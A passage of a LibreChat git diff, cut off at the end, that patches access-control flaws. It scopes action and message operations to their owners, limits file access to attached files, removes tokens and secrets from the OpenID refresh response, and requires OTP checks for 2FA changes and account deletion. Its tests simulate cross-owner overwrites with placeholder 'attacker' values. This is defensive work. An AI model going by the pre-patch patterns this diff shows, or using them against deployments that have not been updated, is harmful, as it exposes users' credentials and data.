diff --git a/api/db/indexSync.js b/api/db/indexSync.js index 8e8e999d92..130cde77b8 100644 --- a/api/db/indexSync.js +++ b/api/db/indexSync.js @@ -236,8 +236,12 @@ async function performSync(flowManager, flowId, flowType) { const messageCount = messageProgress.totalDocuments; const messagesIndexed = messageProgress.totalProcessed; const unindexedMessages = messageCount - messagesIndexed; + const noneIndexed = messagesIndexed === 0 && unindexedMessages > 0; - if (settingsUpdated || unindexedMessages > syncThreshold) { + if (settingsUpdated || noneIndexed || unindexedMessages > syncThreshold) { + if (noneIndexed && !settingsUpdated) { + logger.info('[indexSync] No messages marked as indexed, forcing full sync'); + } logger.info(`[indexSync] Starting message sync (${unindexedMessages} unindexed)`); await Message.syncWithMeili(); messagesSync = true; @@ -261,9 +265,13 @@ async function performSync(flowManager, flowId, flowType) { const convoCount = convoProgress.totalDocuments; const convosIndexed = convoProgress.totalProcessed; - const unindexedConvos = convoCount - convosIndexed; - if (settingsUpdated || unindexedConvos > syncThreshold) { + const noneConvosIndexed = convosIndexed === 0 && unindexedConvos > 0; + + if (settingsUpdated || noneConvosIndexed || unindexedConvos > syncThreshold) { + if (noneConvosIndexed && !settingsUpdated) { + logger.info('[indexSync] No conversations marked as indexed, forcing full sync'); + } logger.info(`[indexSync] Starting convos sync (${unindexedConvos} unindexed)`); await Conversation.syncWithMeili(); convosSync = true; diff --git a/api/db/indexSync.spec.js b/api/db/indexSync.spec.js index c2e5901d6a..dbe07c7595 100644 --- a/api/db/indexSync.spec.js +++ b/api/db/indexSync.spec.js @@ -462,4 +462,69 @@ describe('performSync() - syncThreshold logic', () => { ); expect(mockLogger.info).toHaveBeenCalledWith('[indexSync] Starting convos sync (50 unindexed)'); }); + + test('forces sync when zero documents indexed (reset scenario) even if below threshold', async () => { + Message.getSyncProgress.mockResolvedValue({ + totalProcessed: 0, + totalDocuments: 680, + isComplete: false, + }); + + Conversation.getSyncProgress.mockResolvedValue({ + totalProcessed: 0, + totalDocuments: 76, + isComplete: false, + }); + + Message.syncWithMeili.mockResolvedValue(undefined); + Conversation.syncWithMeili.mockResolvedValue(undefined); + + const indexSync = require('./indexSync'); + await indexSync(); + + expect(Message.syncWithMeili).toHaveBeenCalledTimes(1); + expect(Conversation.syncWithMeili).toHaveBeenCalledTimes(1); + expect(mockLogger.info).toHaveBeenCalledWith( + '[indexSync] No messages marked as indexed, forcing full sync', + ); + expect(mockLogger.info).toHaveBeenCalledWith( + '[indexSync] Starting message sync (680 unindexed)', + ); + expect(mockLogger.info).toHaveBeenCalledWith( + '[indexSync] No conversations marked as indexed, forcing full sync', + ); + expect(mockLogger.info).toHaveBeenCalledWith('[indexSync] Starting convos sync (76 unindexed)'); + }); + + test('does NOT force sync when some documents already indexed and below threshold', async () => { + Message.getSyncProgress.mockResolvedValue({ + totalProcessed: 630, + totalDocuments: 680, + isComplete: false, + }); + + Conversation.getSyncProgress.mockResolvedValue({ + totalProcessed: 70, + totalDocuments: 76, + isComplete: false, + }); + + const indexSync = require('./indexSync'); + await indexSync(); + + expect(Message.syncWithMeili).not.toHaveBeenCalled(); + expect(Conversation.syncWithMeili).not.toHaveBeenCalled(); + expect(mockLogger.info).not.toHaveBeenCalledWith( + '[indexSync] No messages marked as indexed, forcing full sync', + ); + expect(mockLogger.info).not.toHaveBeenCalledWith( + '[indexSync] No conversations marked as indexed, forcing full sync', + ); + expect(mockLogger.info).toHaveBeenCalledWith( + '[indexSync] 50 messages unindexed (below threshold: 1000, skipping)', + ); + expect(mockLogger.info).toHaveBeenCalledWith( + '[indexSync] 6 convos unindexed (below threshold: 1000, skipping)', + ); + }); }); diff --git a/api/jest.config.js b/api/jest.config.js index 3b752403c1..47f8b7287b 100644 --- a/api/jest.config.js +++ b/api/jest.config.js @@ -9,7 +9,7 @@ module.exports = { moduleNameMapper: { '~/(.*)': '/$1', '~/data/auth.json': '/__mocks__/auth.mock.json', - '^openid-client/passport$': '/test/__mocks__/openid-client-passport.js', // Mock for the passport strategy part + '^openid-client/passport$': '/test/__mocks__/openid-client-passport.js', '^openid-client$': '/test/__mocks__/openid-client.js', }, transformIgnorePatterns: ['/node_modules/(?!(openid-client|oauth4webapi|jose)/).*/'], diff --git a/api/models/Action.js b/api/models/Action.js index 20aa20a7e4..f14c415d5b 100644 --- a/api/models/Action.js +++ b/api/models/Action.js @@ -4,9 +4,7 @@ const { Action } = require('~/db/models'); * Update an action with new data without overwriting existing properties, * or create a new action if it doesn't exist. * - * @param {Object} searchParams - The search parameters to find the action to update. - * @param {string} searchParams.action_id - The ID of the action to update. - * @param {string} searchParams.user - The user ID of the action's author. + * @param {{ action_id: string, agent_id?: string, assistant_id?: string, user?: string }} searchParams * @param {Object} updateData - An object containing the properties to update. * @returns {Promise} The updated or newly created action document as a plain object. */ @@ -47,10 +45,8 @@ const getActions = async (searchParams, includeSensitive = false) => { /** * Deletes an action by params. * - * @param {Object} searchParams - The search parameters to find the action to delete. - * @param {string} searchParams.action_id - The ID of the action to delete. - * @param {string} searchParams.user - The user ID of the action's author. - * @returns {Promise} A promise that resolves to the deleted action document as a plain object, or null if no document was found. + * @param {{ action_id: string, agent_id?: string, assistant_id?: string, user?: string }} searchParams + * @returns {Promise} The deleted action document as a plain object, or null if no match. */ const deleteAction = async (searchParams) => { return await Action.findOneAndDelete(searchParams).lean(); diff --git a/api/models/Action.spec.js b/api/models/Action.spec.js new file mode 100644 index 0000000000..61a3b10f0f --- /dev/null +++ b/api/models/Action.spec.js @@ -0,0 +1,250 @@ +const mongoose = require('mongoose'); +const { MongoMemoryServer } = require('mongodb-memory-server'); +const { actionSchema } = require('@librechat/data-schemas'); +const { updateAction, getActions, deleteAction } = require('./Action'); + +let mongoServer; + +beforeAll(async () => { + mongoServer = await MongoMemoryServer.create(); + const mongoUri = mongoServer.getUri(); + if (!mongoose.models.Action) { + mongoose.model('Action', actionSchema); + } + await mongoose.connect(mongoUri); +}, 20000); + +afterAll(async () => { + await mongoose.disconnect(); + await mongoServer.stop(); +}); + +beforeEach(async () => { + await mongoose.models.Action.deleteMany({}); +}); + +const userId = new mongoose.Types.ObjectId(); + +describe('Action ownership scoping', () => { + describe('updateAction', () => { + it('updates when action_id and agent_id both match', async () => { + await mongoose.models.Action.create({ + user: userId, + action_id: 'act_1', + agent_id: 'agent_A', + metadata: { domain: 'example.com' }, + }); + + const result = await updateAction( + { action_id: 'act_1', agent_id: 'agent_A' }, + { metadata: { domain: 'updated.com' } }, + ); + + expect(result).not.toBeNull(); + expect(result.metadata.domain).toBe('updated.com'); + expect(result.agent_id).toBe('agent_A'); + }); + + it('does not update when agent_id does not match (creates a new doc via upsert)', async () => { + await mongoose.models.Action.create({ + user: userId, + action_id: 'act_1', + agent_id: 'agent_B', + metadata: { domain: 'victim.com', api_key: 'secret' }, + }); + + const result = await updateAction( + { action_id: 'act_1', agent_id: 'agent_A' }, + { user: userId, metadata: { domain: 'attacker.com' } }, + ); + + expect(result.metadata.domain).toBe('attacker.com'); + + const original = await mongoose.models.Action.findOne({ + action_id: 'act_1', + agent_id: 'agent_B', + }).lean(); + expect(original).not.toBeNull(); + expect(original.metadata.domain).toBe('victim.com'); + expect(original.metadata.api_key).toBe('secret'); + }); + + it('updates when action_id and assistant_id both match', async () => { + await mongoose.models.Action.create({ + user: userId, + action_id: 'act_2', + assistant_id: 'asst_X', + metadata: { domain: 'example.com' }, + }); + + const result = await updateAction( + { action_id: 'act_2', assistant_id: 'asst_X' }, + { metadata: { domain: 'updated.com' } }, + ); + + expect(result).not.toBeNull(); + expect(result.metadata.domain).toBe('updated.com'); + }); + + it('does not overwrite when assistant_id does not match', async () => { + await mongoose.models.Action.create({ + user: userId, + action_id: 'act_2', + assistant_id: 'asst_victim', + metadata: { domain: 'victim.com', api_key: 'secret' }, + }); + + await updateAction( + { action_id: 'act_2', assistant_id: 'asst_attacker' }, + { user: userId, metadata: { domain: 'attacker.com' } }, + ); + + const original = await mongoose.models.Action.findOne({ + action_id: 'act_2', + assistant_id: 'asst_victim', + }).lean(); + expect(original).not.toBeNull(); + expect(original.metadata.domain).toBe('victim.com'); + expect(original.metadata.api_key).toBe('secret'); + }); + }); + + describe('deleteAction', () => { + it('deletes when action_id and agent_id both match', async () => { + await mongoose.models.Action.create({ + user: userId, + action_id: 'act_del', + agent_id: 'agent_A', + metadata: { domain: 'example.com' }, + }); + + const result = await deleteAction({ action_id: 'act_del', agent_id: 'agent_A' }); + expect(result).not.toBeNull(); + expect(result.action_id).toBe('act_del'); + + const remaining = await mongoose.models.Action.countDocuments(); + expect(remaining).toBe(0); + }); + + it('returns null and preserves the document when agent_id does not match', async () => { + await mongoose.models.Action.create({ + user: userId, + action_id: 'act_del', + agent_id: 'agent_B', + metadata: { domain: 'victim.com' }, + }); + + const result = await deleteAction({ action_id: 'act_del', agent_id: 'agent_A' }); + expect(result).toBeNull(); + + const remaining = await mongoose.models.Action.countDocuments(); + expect(remaining).toBe(1); + }); + + it('deletes when action_id and assistant_id both match', async () => { + await mongoose.models.Action.create({ + user: userId, + action_id: 'act_del_asst', + assistant_id: 'asst_X', + metadata: { domain: 'example.com' }, + }); + + const result = await deleteAction({ action_id: 'act_del_asst', assistant_id: 'asst_X' }); + expect(result).not.toBeNull(); + + const remaining = await mongoose.models.Action.countDocuments(); + expect(remaining).toBe(0); + }); + + it('returns null and preserves the document when assistant_id does not match', async () => { + await mongoose.models.Action.create({ + user: userId, + action_id: 'act_del_asst', + assistant_id: 'asst_victim', + metadata: { domain: 'victim.com' }, + }); + + const result = await deleteAction({ + action_id: 'act_del_asst', + assistant_id: 'asst_attacker', + }); + expect(result).toBeNull(); + + const remaining = await mongoose.models.Action.countDocuments(); + expect(remaining).toBe(1); + }); + }); + + describe('getActions (unscoped baseline)', () => { + it('returns actions by action_id regardless of agent_id', async () => { + await mongoose.models.Action.create({ + user: userId, + action_id: 'act_shared', + agent_id: 'agent_B', + metadata: { domain: 'example.com' }, + }); + + const results = await getActions({ action_id: 'act_shared' }, true); + expect(results).toHaveLength(1); + expect(results[0].agent_id).toBe('agent_B'); + }); + + it('returns actions scoped by agent_id when provided', async () => { + await mongoose.models.Action.create({ + user: userId, + action_id: 'act_scoped', + agent_id: 'agent_A', + metadata: { domain: 'a.com' }, + }); + await mongoose.models.Action.create({ + user: userId, + action_id: 'act_other', + agent_id: 'agent_B', + metadata: { domain: 'b.com' }, + }); + + const results = await getActions({ agent_id: 'agent_A' }); + expect(results).toHaveLength(1); + expect(results[0].action_id).toBe('act_scoped'); + }); + }); + + describe('cross-type protection', () => { + it('updateAction with agent_id filter does not overwrite assistant-owned action', async () => { + await mongoose.models.Action.create({ + user: userId, + action_id: 'act_cross', + assistant_id: 'asst_victim', + metadata: { domain: 'victim.com', api_key: 'secret' }, + }); + + await updateAction( + { action_id: 'act_cross', agent_id: 'agent_attacker' }, + { user: userId, metadata: { domain: 'evil.com' } }, + ); + + const original = await mongoose.models.Action.findOne({ + action_id: 'act_cross', + assistant_id: 'asst_victim', + }).lean(); + expect(original).not.toBeNull(); + expect(original.metadata.domain).toBe('victim.com'); + expect(original.metadata.api_key).toBe('secret'); + }); + + it('deleteAction with agent_id filter does not delete assistant-owned action', async () => { + await mongoose.models.Action.create({ + user: userId, + action_id: 'act_cross_del', + assistant_id: 'asst_victim', + metadata: { domain: 'victim.com' }, + }); + + const result = await deleteAction({ action_id: 'act_cross_del', agent_id: 'agent_attacker' }); + expect(result).toBeNull(); + + const remaining = await mongoose.models.Action.countDocuments(); + expect(remaining).toBe(1); + }); + }); +}); diff --git a/api/models/Conversation.js b/api/models/Conversation.js index 32eac1a764..121eaa9696 100644 --- a/api/models/Conversation.js +++ b/api/models/Conversation.js @@ -228,7 +228,7 @@ module.exports = { }, ], }; - } catch (err) { + } catch (_err) { logger.warn('[getConvosByCursor] Invalid cursor format, starting from beginning'); } if (cursorFilter) { @@ -361,6 +361,7 @@ module.exports = { const deleteMessagesResult = await deleteMessages({ conversationId: { $in: conversationIds }, + user, }); return { ...deleteConvoResult, messages: deleteMessagesResult }; diff --git a/api/models/Conversation.spec.js b/api/models/Conversation.spec.js index bd415b4165..e9e4b5762d 100644 --- a/api/models/Conversation.spec.js +++ b/api/models/Conversation.spec.js @@ -549,6 +549,7 @@ describe('Conversation Operations', () => { expect(result.messages.deletedCount).toBe(5); expect(deleteMessages).toHaveBeenCalledWith({ conversationId: { $in: [mockConversationData.conversationId] }, + user: 'user123', }); // Verify conversation was deleted diff --git a/api/models/File.spec.js b/api/models/File.spec.js index 2d4282cff7..ecb2e21b08 100644 --- a/api/models/File.spec.js +++ b/api/models/File.spec.js @@ -152,12 +152,11 @@ describe('File Access Control', () => { expect(accessMap.get(fileIds[3])).toBe(false); }); - it('should grant access to all files when user is the agent author', async () => { + it('should only grant author access to files attached to the agent', async () => { const authorId = new mongoose.Types.ObjectId(); const agentId = uuidv4(); const fileIds = [uuidv4(), uuidv4(), uuidv4()]; - // Create author user await User.create({ _id: authorId, email: 'author@example.com', @@ -165,7 +164,6 @@ describe('File Access Control', () => { provider: 'local', }); - // Create agent await createAgent({ id: agentId, name: 'Test Agent', @@ -174,12 +172,83 @@ describe('File Access Control', () => { provider: 'openai', tool_resources: { file_search: { - file_ids: [fileIds[0]], // Only one file attached + file_ids: [fileIds[0]], + }, + }, + }); + + const { hasAccessToFilesViaAgent } = require('~/server/services/Files/permissions'); + const accessMap = await hasAccessToFilesViaAgent({ + userId: authorId, + role: SystemRoles.USER, + fileIds, + agentId, + }); + + expect(accessMap.get(fileIds[0])).toBe(true); + expect(accessMap.get(fileIds[1])).toBe(false); + expect(accessMap.get(fileIds[2])).toBe(false); + }); + + it('should deny all access when agent has no tool_resources', async () => { + const authorId = new mongoose.Types.ObjectId(); + const agentId = uuidv4(); + const fileId = uuidv4(); + + await User.create({ + _id: authorId, + email: 'author-no-resources@example.com', + emailVerified: true, + provider: 'local', + }); + + await createAgent({ + id: agentId, + name: 'Bare Agent', + author: authorId, + model: 'gpt-4', + provider: 'openai', + }); + + const { hasAccessToFilesViaAgent } = require('~/server/services/Files/permissions'); + const accessMap = await hasAccessToFilesViaAgent({ + userId: authorId, + role: SystemRoles.USER, + fileIds: [fileId], + agentId, + }); + + expect(accessMap.get(fileId)).toBe(false); + }); + + it('should grant access to files across multiple resource types', async () => { + const authorId = new mongoose.Types.ObjectId(); + const agentId = uuidv4(); + const fileIds = [uuidv4(), uuidv4(), uuidv4()]; + + await User.create({ + _id: authorId, + email: 'author-multi@example.com', + emailVerified: true, + provider: 'local', + }); + + await createAgent({ + id: agentId, + name: 'Multi Resource Agent', + author: authorId, + model: 'gpt-4', + provider: 'openai', + tool_resources: { + file_search: { + file_ids: [fileIds[0]], + }, + execute_code: { + file_ids: [fileIds[1]], }, }, }); - // Check access as the author const { hasAccessToFilesViaAgent } = require('~/server/services/Files/permissions'); const accessMap = await hasAccessToFilesViaAgent({ userId: authorId, @@ -188,10 +257,48 @@ describe('File Access Control', () => { agentId, }); - // Author should have access to all files expect(accessMap.get(fileIds[0])).toBe(true); expect(accessMap.get(fileIds[1])).toBe(true); - expect(accessMap.get(fileIds[2])).toBe(true); + expect(accessMap.get(fileIds[2])).toBe(false); + }); + + it('should grant author access to attached files when isDelete is true', async () => { + const authorId = new mongoose.Types.ObjectId(); + const agentId = uuidv4(); + const attachedFileId = uuidv4(); + const unattachedFileId = uuidv4(); + + await User.create({ + _id: authorId, + email: 'author-delete@example.com', + emailVerified: true, + provider: 'local', + }); + + await createAgent({ + id: agentId, + name: 'Delete Test Agent', + author: authorId, + model: 'gpt-4', + provider: 'openai', + tool_resources: { + file_search: { + file_ids: [attachedFileId], + }, + }, + }); + + const { hasAccessToFilesViaAgent } = require('~/server/services/Files/permissions'); + const accessMap = await hasAccessToFilesViaAgent({ + userId: authorId, + role: SystemRoles.USER, + fileIds: [attachedFileId, unattachedFileId], + agentId, + isDelete: true, + }); + + expect(accessMap.get(attachedFileId)).toBe(true); + expect(accessMap.get(unattachedFileId)).toBe(false); }); it('should handle non-existent agent gracefully', async () => { diff --git a/api/models/loadAddedAgent.js b/api/models/loadAddedAgent.js index aa83375eae..101ee96685 100644 --- a/api/models/loadAddedAgent.js +++ b/api/models/loadAddedAgent.js @@ -48,14 +48,14 @@ const loadAddedAgent = async ({ req, conversation, primaryAgent }) => { return null; } - // If there's an agent_id, load the existing agent if (conversation.agent_id && !isEphemeralAgentId(conversation.agent_id)) { - if (!getAgent) { - throw new Error('getAgent not initialized - call setGetAgent first'); + let agent = req.resolvedAddedAgent; + if (!agent) { + if (!getAgent) { + throw new Error('getAgent not initialized - call setGetAgent first'); + } + agent = await getAgent({ id: conversation.agent_id }); } - const agent = await getAgent({ - id: conversation.agent_id, - }); if (!agent) { logger.warn(`[loadAddedAgent] Agent ${conversation.agent_id} not found`); diff --git a/api/package.json b/api/package.json index 1618481b58..89a5183ddd 100644 --- a/api/package.json +++ b/api/package.json @@ -44,7 +44,7 @@ "@google/genai": "^1.19.0", "@keyv/redis": "^4.3.3", "@langchain/core": "^0.3.80", - "@librechat/agents": "^3.1.55", + "@librechat/agents": "^3.1.56", "@librechat/api": "*", "@librechat/data-schemas": "*", "@microsoft/microsoft-graph-client": "^3.0.7", @@ -67,7 +67,7 @@ "express-rate-limit": "^8.3.0", "express-session": "^1.18.2", "express-static-gzip": "^2.2.0", - "file-type": "^18.7.0", + "file-type": "^21.3.2", "firebase": "^11.0.2", "form-data": "^4.0.4", "handlebars": "^4.7.7", @@ -109,7 +109,7 @@ "sharp": "^0.33.5", "traverse": "^0.6.7", "ua-parser-js": "^1.0.36", - "undici": "^7.18.2", + "undici": "^7.24.1", "winston": "^3.11.0", "winston-daily-rotate-file": "^5.0.0", "xlsx": "https://cdn.sheetjs.com/xlsx-0.20.3/xlsx-0.20.3.tgz", diff --git a/api/server/controllers/AuthController.js b/api/server/controllers/AuthController.js index 13d024cd03..eb44feffa4 100644 --- a/api/server/controllers/AuthController.js +++ b/api/server/controllers/AuthController.js @@ -119,14 +119,8 @@ const refreshController = async (req, res) => { const token = setOpenIDAuthTokens(tokenset, req, res, user._id.toString(), refreshToken); - user.federatedTokens = { - access_token: tokenset.access_token, - id_token: tokenset.id_token, - refresh_token: refreshToken, - expires_at: claims.exp, - }; - - return res.status(200).send({ token, user }); + const { password: _pw, __v: _v, totpSecret: _ts, backupCodes: _bc, ...safeUser } = user; + return res.status(200).send({ token, user: safeUser }); } catch (error) { logger.error('[refreshController] OpenID token refresh error', error); return res.status(403).send('Invalid OpenID refresh token'); diff --git a/api/server/controllers/AuthController.spec.js b/api/server/controllers/AuthController.spec.js index fef670baa8..964947def9 100644 --- a/api/server/controllers/AuthController.spec.js +++ b/api/server/controllers/AuthController.spec.js @@ -163,6 +163,16 @@ describe('refreshController – OpenID path', () => { exp: 9999999999, }; + const defaultUser = { + _id: 'user-db-id', + email: baseClaims.email, + openidId: baseClaims.sub, + password: '$2b$10$hashedpassword', + __v: 0, + totpSecret: 'encrypted-totp-secret', + backupCodes: ['hashed-code-1', 'hashed-code-2'], + }; + let req, res; beforeEach(() => { @@ -174,6 +184,7 @@ describe('refreshController – OpenID path', () => { mockTokenset.claims.mockReturnValue(baseClaims); getOpenIdEmail.mockReturnValue(baseClaims.email); setOpenIDAuthTokens.mockReturnValue('new-app-token'); + findOpenIDUser.mockResolvedValue({ user: { ...defaultUser }, error: null, migration: false }); updateUser.mockResolvedValue({}); req = { @@ -189,13 +200,6 @@ describe('refreshController – OpenID path', () => { }); it('should call getOpenIdEmail with token claims and use result for findOpenIDUser', async () => { - const user = { - _id: 'user-db-id', - email: baseClaims.email, - openidId: baseClaims.sub, - }; - findOpenIDUser.mockResolvedValue({ user, error: null, migration: false }); - await refreshController(req, res); expect(getOpenIdEmail).toHaveBeenCalledWith(baseClaims); @@ -229,13 +233,6 @@ describe('refreshController – OpenID path', () => { it('should fall back to claims.email when configured claim is absent from token claims', async () => { getOpenIdEmail.mockReturnValue(baseClaims.email); - const user = { - _id: 'user-db-id', - email: baseClaims.email, - openidId: baseClaims.sub, - }; - findOpenIDUser.mockResolvedValue({ user, error: null, migration: false }); - await refreshController(req, res); expect(findOpenIDUser).toHaveBeenCalledWith( @@ -243,6 +240,25 @@ describe('refreshController – OpenID path', () => { ); }); + it('should not expose sensitive fields or federatedTokens in refresh response', async () => { + await refreshController(req, res); + + const sentPayload = res.send.mock.calls[0][0]; + expect(sentPayload).toEqual({ + token: 'new-app-token', + user: expect.objectContaining({ + _id: 'user-db-id', + email: baseClaims.email, + openidId: baseClaims.sub, + }), + }); + expect(sentPayload.user).not.toHaveProperty('federatedTokens'); + expect(sentPayload.user).not.toHaveProperty('password'); + expect(sentPayload.user).not.toHaveProperty('totpSecret'); + expect(sentPayload.user).not.toHaveProperty('backupCodes'); + expect(sentPayload.user).not.toHaveProperty('__v'); + }); + it('should update openidId when migration is triggered on refresh', async () => { const user = { _id: 'user-db-id', email: baseClaims.email, openidId: null }; findOpenIDUser.mockResolvedValue({ user, error: null, migration: true }); diff --git a/api/server/controllers/TwoFactorController.js b/api/server/controllers/TwoFactorController.js index fde5965261..18a0ee3f5a 100644 --- a/api/server/controllers/TwoFactorController.js +++ b/api/server/controllers/TwoFactorController.js @@ -1,5 +1,6 @@ const { encryptV3, logger } = require('@librechat/data-schemas'); const { + verifyOTPOrBackupCode, generateBackupCodes, generateTOTPSecret, verifyBackupCode, @@ -13,24 +14,42 @@ const safeAppTitle = (process.env.APP_TITLE || 'LibreChat').replace(/\s+/g, ''); /** * Enable 2FA for the user by generating a new TOTP secret and backup codes. * The secret is encrypted and stored, and 2FA is marked as disabled until confirmed. + * If 2FA is already enabled, requires OTP or backup code verification to re-enroll. */ const enable2FA = async (req, res) => { try { const userId = req.user.id; + const existingUser = await getUserById( + userId, + '+totpSecret +backupCodes _id twoFactorEnabled email', + ); + + if (existingUser && existingUser.twoFactorEnabled) { + const { token, backupCode } = req.body; + const result = await verifyOTPOrBackupCode({ + user: existingUser, + token, + backupCode, + persistBackupUse: false, + }); + + if (!result.verified) { + const msg = result.message ?? 'TOTP token or backup code is required to re-enroll 2FA'; + return res.status(result.status ?? 400).json({ message: msg }); + } + } + const secret = generateTOTPSecret(); const { plainCodes, codeObjects } = await generateBackupCodes(); - - // Encrypt the secret with v3 encryption before saving. const encryptedSecret = encryptV3(secret); - // Update the user record: store the secret & backup codes and set twoFactorEnabled to false. const user = await updateUser(userId, { - totpSecret: encryptedSecret, - backupCodes: codeObjects, - twoFactorEnabled: false, + pendingTotpSecret: encryptedSecret, + pendingBackupCodes: codeObjects, }); - const otpauthUrl = `otpauth://totp/${safeAppTitle}:${user.email}?secret=${secret}&issuer=${safeAppTitle}`; + const email = user.email || (existingUser && existingUser.email) || ''; + const otpauthUrl = `otpauth://totp/${safeAppTitle}:${email}?secret=${secret}&issuer=${safeAppTitle}`; return res.status(200).json({ otpauthUrl, backupCodes: plainCodes }); } catch (err) { @@ -46,13 +65,14 @@ const verify2FA = async (req, res) => { try { const userId = req.user.id; const { token, backupCode } = req.body; - const user = await getUserById(userId, '_id totpSecret backupCodes'); + const user = await getUserById(userId, '+totpSecret +pendingTotpSecret +backupCodes _id'); + const secretSource = user?.pendingTotpSecret ?? user?.totpSecret; - if (!user || !user.totpSecret) { + if (!user || !secretSource) { return res.status(400).json({ message: '2FA not initiated' }); } - const secret = await getTOTPSecret(user.totpSecret); + const secret = await getTOTPSecret(secretSource); let isVerified = false; if (token) { @@ -78,15 +98,28 @@ const confirm2FA = async (req, res) => { try { const userId = req.user.id; const { token } = req.body; - const user = await getUserById(userId, '_id totpSecret'); + const user = await getUserById( + userId, + '+totpSecret +pendingTotpSecret +pendingBackupCodes _id', + ); + const secretSource = user?.pendingTotpSecret ?? user?.totpSecret; - if (!user || !user.totpSecret) { + if (!user || !secretSource) { return res.status(400).json({ message: '2FA not initiated' }); } - const secret = await getTOTPSecret(user.totpSecret); + const secret = await getTOTPSecret(secretSource); if (await verifyTOTP(secret, token)) { - await updateUser(userId, { twoFactorEnabled: true }); + const update = { + totpSecret: user.pendingTotpSecret ?? user.totpSecret, + twoFactorEnabled: true, + pendingTotpSecret: null, + pendingBackupCodes: [], + }; + if (user.pendingBackupCodes?.length) { + update.backupCodes = user.pendingBackupCodes; + } + await updateUser(userId, update); return res.status(200).json(); } return res.status(400).json({ message: 'Invalid token.' }); @@ -104,31 +137,27 @@ const disable2FA = async (req, res) => { try { const userId = req.user.id; const { token, backupCode } = req.body; - const user = await getUserById(userId, '_id totpSecret backupCodes'); + const user = await getUserById(userId, '+totpSecret +backupCodes _id twoFactorEnabled'); if (!user || !user.totpSecret) { return res.status(400).json({ message: '2FA is not setup for this user' }); } if (user.twoFactorEnabled) { - const secret = await getTOTPSecret(user.totpSecret); - let isVerified = false; + const result = await verifyOTPOrBackupCode({ user, token, backupCode }); - if (token) { - isVerified = await verifyTOTP(secret, token); - } else if (backupCode) { - isVerified = await verifyBackupCode({ user, backupCode }); - } else { - return res - .status(400) - .json({ message: 'Either token or backup code is required to disable 2FA' }); - } - - if (!isVerified) { - return res.status(401).json({ message: 'Invalid token or backup code' }); + if (!result.verified) { + const msg = result.message ?? 'Either token or backup code is required to disable 2FA'; + return res.status(result.status ?? 400).json({ message: msg }); } } - await updateUser(userId, { totpSecret: null, backupCodes: [], twoFactorEnabled: false }); + await updateUser(userId, { + totpSecret: null, + backupCodes: [], + twoFactorEnabled: false, + pendingTotpSecret: null, + pendingBackupCodes: [], + }); return res.status(200).json(); } catch (err) { logger.error('[disable2FA]', err); @@ -138,10 +167,28 @@ const disable2FA = async (req, res) => { /** * Regenerate backup codes for the user. + * Requires OTP or backup code verification if 2FA is already enabled. */ const regenerateBackupCodes = async (req, res) => { try { const userId = req.user.id; + const user = await getUserById(userId, '+totpSecret +backupCodes _id twoFactorEnabled'); + + if (!user) { + return res.status(404).json({ message: 'User not found' }); + } + + if (user.twoFactorEnabled) { + const { token, backupCode } = req.body; + const result = await verifyOTPOrBackupCode({ user, token, backupCode }); + + if (!result.verified) { + const msg = + result.message ?? 'TOTP token or backup code is required to regenerate backup codes'; + return res.status(result.status ?? 400).json({ message: msg }); + } + } + const { plainCodes, codeObjects } = await generateBackupCodes(); await updateUser(userId, { backupCodes: codeObjects }); return res.status(200).json({ diff --git a/api/server/controllers/UserController.js b/api/server/controllers/UserController.js index 7a9dd8125e..6d5df0ac8d 100644 --- a/api/server/controllers/UserController.js +++ b/api/server/controllers/UserController.js @@ -14,6 +14,7 @@ const { deleteMessages, deletePresets, deleteUserKey, + getUserById, deleteConvos, deleteFiles, updateUser, @@ -34,6 +35,7 @@ const { User, } = require('~/db/models'); const { updateUserPluginAuth, deleteUserPluginAuth } = require('~/server/services/PluginService'); +const { verifyOTPOrBackupCode } = require('~/server/services/twoFactorService'); const { verifyEmail, resendVerificationEmail } = require('~/server/services/AuthService'); const { getMCPManager, getFlowStateManager, getMCPServersRegistry } = require('~/config'); const { invalidateCachedTools } = require('~/server/services/Config/getCachedTools'); @@ -241,6 +243,22 @@ const deleteUserController = async (req, res) => { const { user } = req; try { + const existingUser = await getUserById( + user.id, + '+totpSecret +backupCodes _id twoFactorEnabled', + ); + if (existingUser && existingUser.twoFactorEnabled) { + const { token, backupCode } = req.body; + const result = await verifyOTPOrBackupCode({ user: existingUser, token, backupCode }); + + if (!result.verified) { + const msg = + result.message ?? + 'TOTP token or backup code is required to delete account with 2FA enabled'; + return res.status(result.status ?? 400).json({ message: msg }); + } + } + await deleteMessages({ user: user.id }); // delete user messages await deleteAllUserSessions({ userId: user.id }); // delete user sessions await Transaction.deleteMany({ user: user.id }); // delete user transactions @@ -352,6 +370,7 @@ const maybeUninstallOAuthMCP = async (userId, pluginKey, appConfig) => { serverConfig.oauth?.revocation_endpoint_auth_methods_supported ?? clientMetadata.revocation_endpoint_auth_methods_supported; const oauthHeaders = serverConfig.oauth_headers ?? {}; + const allowedDomains = getMCPServersRegistry().getAllowedDomains(); if (tokens?.access_token) { try { @@ -367,6 +386,7 @@ const maybeUninstallOAuthMCP = async (userId, pluginKey, appConfig) => { revocationEndpointAuthMethodsSupported, }, oauthHeaders, + allowedDomains, ); } catch (error) { logger.error(`Error revoking OAuth access token for ${serverName}:`, error); @@ -387,6 +407,7 @@ const maybeUninstallOAuthMCP = async (userId, pluginKey, appConfig) => { revocationEndpointAuthMethodsSupported, }, oauthHeaders, + allowedDomains, ); } catch (error) { logger.error(`Error revoking OAuth refresh token for ${serverName}:`, error); diff --git a/api/server/controllers/__tests__/TwoFactorController.spec.js b/api/server/controllers/__tests__/TwoFactorController.spec.js new file mode 100644 index 0000000000..62531d94a1 --- /dev/null +++ b/api/server/controllers/__tests__/TwoFactorController.spec.js @@ -0,0 +1,264 @@ +const mockGetUserById = jest.fn(); +const mockUpdateUser = jest.fn(); +const mockVerifyOTPOrBackupCode = jest.fn(); +const mockGenerateTOTPSecret = jest.fn(); +const mockGenerateBackupCodes = jest.fn(); +const mockEncryptV3 = jest.fn(); + +jest.mock('@librechat/data-schemas', () => ({ + encryptV3: (...args) => mockEncryptV3(...args), + logger: { error: jest.fn() }, +})); + +jest.mock('~/server/services/twoFactorService', () => ({ + verifyOTPOrBackupCode: (...args) => mockVerifyOTPOrBackupCode(...args), + generateBackupCodes: (...args) => mockGenerateBackupCodes(...args), + generateTOTPSecret: (...args) => mockGenerateTOTPSecret(...args), + verifyBackupCode: jest.fn(), + getTOTPSecret: jest.fn(), + verifyTOTP: jest.fn(), +})); + +jest.mock('~/models', () => ({ + getUserById: (...args) => mockGetUserById(...args), + updateUser: (...args) => mockUpdateUser(...args), +})); + +const { enable2FA, regenerateBackupCodes } = require('~/server/controllers/TwoFactorController'); + +function createRes() { + const 